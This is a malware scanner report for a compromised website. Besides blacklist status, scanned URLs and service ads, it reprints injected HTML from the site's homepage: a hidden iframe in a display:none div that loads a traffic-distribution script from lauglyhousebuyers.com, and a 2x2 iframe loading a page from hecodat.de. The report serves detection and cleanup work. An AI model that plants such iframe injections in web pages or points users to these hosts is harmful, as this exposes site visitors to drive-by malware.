New scan:

Malware Scanner report for xn--brckhouse-m8a.com

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "xn--brckhouse-m8a.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/1/2
1 malicious and 1 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xn--brckhouse-m8a.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://xn--brckhouse-m8a.com/
200 OK
Content-Length: 1607
Content-Type: text/html
malicious
Page code contains blacklisted domain: lauglyhousebuyers.com

...[1457 bytes skipped]...
sh_player.gif" alt="Get Adobe Flash player" />
</a>
<!--[if !IE]>-->
</object>
<!--<![endif]-->
</object>
</div>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?i=3373257></iframe></body>
</html><div style="display:none"><iframe src="http://lauglyhousebuyers.com/tds/sTDS/go.php?sid=6" width=300 height=250></iframe></div>

Malicious iFrame found.
size: 300x250     
src: http://lauglyhousebuyers.com/tds/stds/go.php?sid=6
This URL is marked by Google as suspicious

<iframe src="http://lauglyhousebuyers.com/tds/stds/go.php?sid=6" width=300 height=250>

Hidden iFrame found.
size: 2x2     
src: http://hecodat.de/zwmd.html?i=3373257

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?i=3373257>

http://xn--brckhouse-m8a.com/js/swfobject/swfobject.js
404 Not Found
Content-Length: 223
Content-Type: text/html
clean
http://xn--brckhouse-m8a.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://xn--brckhouse-m8a.com/js/swfaddress/swfaddress.js
404 Not Found
Content-Length: 225
Content-Type: text/html
clean
http://xn--brckhouse-m8a.com/js/swffit/swffit.js
404 Not Found
Content-Length: 217
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xn--brckhouse-m8a.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 05:22:11 GMT
Accept-Ranges: bytes
ETag: "3f9c8b-647-4df9c85787980"
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.9
Content-Length: 1607
Content-Type: text/html
Last-Modified: Thu, 20 Jun 2013 21:20:54 GMT

...1607 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--brckhouse-m8a.com
Referer: http://www.google.com/search?q=xn--brckhouse-m8a.com

Result:
The result is similar to the first query. There are no suspicious redirects found.